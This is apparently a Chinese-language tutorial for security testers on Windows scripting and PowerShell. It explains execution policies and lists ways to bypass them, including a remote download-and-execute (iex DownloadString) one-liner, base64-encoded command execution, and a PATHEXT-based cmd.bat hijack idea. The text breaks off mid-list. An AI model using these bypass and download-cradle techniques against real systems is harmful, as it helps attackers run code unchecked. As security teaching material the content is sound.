# 脚本编写与执行 ## 开始之前 我们在开始之前先来介绍在windows平台中常用到的几种脚本 ### Bat 这就是我们常用的Bat脚本,全名为批处理文件,脚本中就是我们在CMD中使用到的命令,这里提一个小问题: CMD的命令行执行命令的优先级是`.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH`,那么假如我通过修改PATHEXT解析顺序后放一个cmd.bat在system32目录下,那么优先执行的是cmd.bat,这里面的内容就变得不可描述起来了 ### VBscript 执行vbs就是常说的vbscript,是微软为了方便自动化管理windows而推出的脚本语言,这里了解一下即可,不是文章重点。 ``` 一个小例子通过vbs操作WMI Set wmi = GetObject("winmgmts:") Set collection = wmi.ExecQuery("select * from Win32_Process") For Each process in collection WScript.Echo process.getObjectText_ Next ``` ## Powershell 这就是我们的主角,在现在和未来一定是powershell占据主要地位(对于这一点搞Win多一点的朋友一定不会怀疑),首先我们来看一个简单的例子 ``` script.ps1: # 脚本内容 function test-conn { Test-Connection -Count 2 -ComputerName $args} # 载入脚本文件 .\script.ps1 # 调用函数 test-conn localhost ``` ### Powershell执行策略 那么你可能会在调用脚本的时候出现报错,这是powershell的安全执行策略,下面我们来了解一下执行策略: PowerShell 提供了 Restricted、AllSigned、RemoteSigned、Unrestricted、Bypass、Undefined 六种类型的执行策略 简单介绍各种策略如下: | 名称 | 说明 | | ------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Restricted | 受限制的,可以执行单个的命令,但是不能执行脚本Windows 8, Windows Server 2012, and Windows 8.1中默认就是这种策略,所以是不能执行脚本的,执行就会报错,那么如何才能执行呢?Set-ExecutionPolicy -ExecutionPolicy Bypass就是设置策略为Bypass这样就可以执行脚本了。 | | AllSigned | AllSigned 执行策略允许执行所有具有数字签名的脚本 | | RemoteSigned | 当执行从网络上下载的脚本时,需要脚本具有数字签名,否则不会运行这个脚本。如果是在本地创建的脚本则可以直接执行,不要求脚本具有数字签名。 | | Unrestricted | 这是一种比较宽容的策略,允许运行未签名的脚本。对于从网络上下载的脚本,在运行前会进行安全性提示。需要你确认是否执行脚本 | | Bypass | Bypass 执行策略对脚本的执行不设任何的限制,任何脚本都可以执行,并且不会有安全性提示。 | | Undefined | Undefined 表示没有设置脚本策略。当然此时会发生继承或应用默认的脚本策略。 | 那么我们如何绕过这些安全策略呢?下面提供几种方法,网上还有很多的绕过方法,大家可以自行研究: | 名称 | 说明 | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | | Get-ExecutionPolicy | 获取当前的执行策略 | | Get-Content .\test.ps1 \| powershell.exe -noprofile - | 通过管道输入进ps | | powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('')" | 通过远程下载脚本来绕过 | |

$command = "Write-Host 'Hello World!'"
$bytes = \[System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = \[Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand

| 通过BASE64编码执行 | ### powershell的脚本调用方法: 1. 如果脚本是直接写的代码而不是只定义了函数那么直接执行脚本.\script.ps1即可 2. 但是如果是载入里面的函数需要`.+空格+.\script.ps1` 3. 或者使用Import-Module .\script.ps1, 这样才能直接使用脚本的函数 ## 通过控制台执行Powershell 对于我们安全测试人员通常获取到的一个Shell是CMD的, 那么我们想要尽可能少的操作就可以直接通过控制台来执行powershell的命令, 那么先来看一个简单的例子: ![](https://raw.githubusercontent.com/myoss114/oss/master/uPic/ps3/1.png) 可以看到我们通过CMD界面执行了Powershell的代码, 那么其实这样的执行方式在真实的安全测试环境中利用更多, 下面是一个Powershell通过这种方式执行的所有可选的参数: ``` PowerShell[.exe] [-PSConsoleFile | -Version ] [-EncodedCommand ] [-ExecutionPolicy ] [-File ] [-InputFormat {Text | XML}] [-NoExit] [-NoLogo] [-NonInteractive] [-NoProfile] [-OutputFormat {Text | XML}] [-Sta] [-WindowStyle